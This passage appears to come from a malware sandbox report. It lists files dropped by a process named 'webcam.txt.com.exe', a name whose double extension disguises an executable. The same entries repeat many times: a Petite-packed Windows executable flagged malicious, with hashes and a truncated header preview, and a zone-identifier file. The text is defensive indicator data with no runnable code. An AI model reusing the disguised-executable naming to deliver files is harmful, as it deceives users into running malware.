                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
